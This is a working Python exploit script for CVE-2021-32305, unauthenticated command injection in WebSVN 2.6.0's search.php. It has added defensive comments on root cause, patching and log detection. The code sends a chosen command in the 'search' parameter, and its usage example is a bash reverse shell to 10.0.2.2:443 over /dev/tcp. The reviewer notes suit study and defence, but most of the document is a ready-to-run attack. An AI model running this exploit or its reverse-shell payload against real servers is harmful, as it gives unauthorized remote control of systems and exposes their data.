# Exploit Author: FredBrave
# CVE: CVE-2021-32305
# Exploit: Websvn 2.6.0 - RCE (Unauthenticated)
#
# Reviewer notes (defensive context):
#   * What the script does: it sends a single unauthenticated GET request to
#     `search.php` with the operator-supplied command placed in the `search`
#     query parameter, wrapped as `";<command>;"` (see execute()).
#   * Root cause (inferred from the payload shape, not shown on this page):
#     the server appears to place the search term inside a double-quoted
#     shell argument without escaping it, so the leading `"` closes the
#     quoting and `;` starts a new command.
#   * Mitigation: upgrade WebSVN to a release that fixes CVE-2021-32305 (the
#     fixed version is not stated on this page; take it from the vendor
#     advisory). Until patched, restrict who can reach search.php. In custom
#     PHP code, pass user input to the shell only through escapeshellarg().
#   * Detection: look in web access logs for requests to `search.php` whose
#     `search` value begins with a double quote followed by `;` (the quote
#     is usually logged percent-encoded as %22), and for the web-server
#     account spawning shells or opening outbound connections.

import optparse
import signal
import sys
import urllib

import requests

# NOTE(review): only `urllib` is imported, yet main() uses `urllib.parse`.
# This presumably works because importing `requests` loads `urllib.parse`
# as a side effect; confirm before reusing this import pattern elsewhere.


# Functions
def helpPanel():
    """Print a usage example and terminate the process with exit status 1."""
    banner = "\n\nExample of the use:\n"
    example = 'python3 exploit.py --url http://10.0.2.1/websvn/ --payload "bash -c \'bash -i >& /dev/tcp/10.0.2.2/443 0>&1\'"\n\n\n'
    print(banner)
    print(example)
    sys.exit(1)


def exiting(sig, frame):
    """SIGINT handler: print a short message and exit with status 1.

    `sig` and `frame` are the arguments the signal module passes to every
    handler; neither is used.
    """
    print("\n\n\nExiting of program...")
    sys.exit(1)


# Ctrl + C
signal.signal(signal.SIGINT, exiting)


def Getarguments():
    """Parse `--url` and `--payload` from the command line.

    Returns the optparse options object, with the URL stored as `.target`
    and the command string as `.payload`. If either option is missing or
    empty, helpPanel() is called, which exits the process.
    """
    cli = optparse.OptionParser()
    cli.add_option('--url', dest='target', help='Url Target')
    cli.add_option('--payload', dest='payload', help='Command to execute')
    opts, _ = cli.parse_args()

    required = (
        (opts.target, "[-] Please indicate the url of target --url, for more information... --help"),
        (opts.payload, "[-] Please indicate the payload --payload, for more information... --help"),
    )
    for value, complaint in required:
        if value:
            continue
        helpPanel()
        # Unreachable in practice: helpPanel() already called sys.exit(1).
        cli.error(complaint)
    return opts


def execute(target, payload):
    """Send the GET request that carries `payload` in the `search` parameter.

    `target` is used as a plain string prefix, so it must already end with
    `/`. `payload` is expected to be URL-encoded by the caller. The HTTP
    response is discarded and nothing is returned.
    """
    # The `";` ... `;"` wrapper is the injection itself: it is what a
    # defender should look for in the `search` parameter of logged requests.
    query = 'search.php?search=";{};"'.format(payload)
    requests.get(target + query)


def main():
    """Read the CLI options, URL-encode the command and send the request."""
    opts = Getarguments()
    base_url = opts.target
    encoded = urllib.parse.quote_plus(opts.payload)
    execute(base_url, encoded)


if __name__ == '__main__':
    main()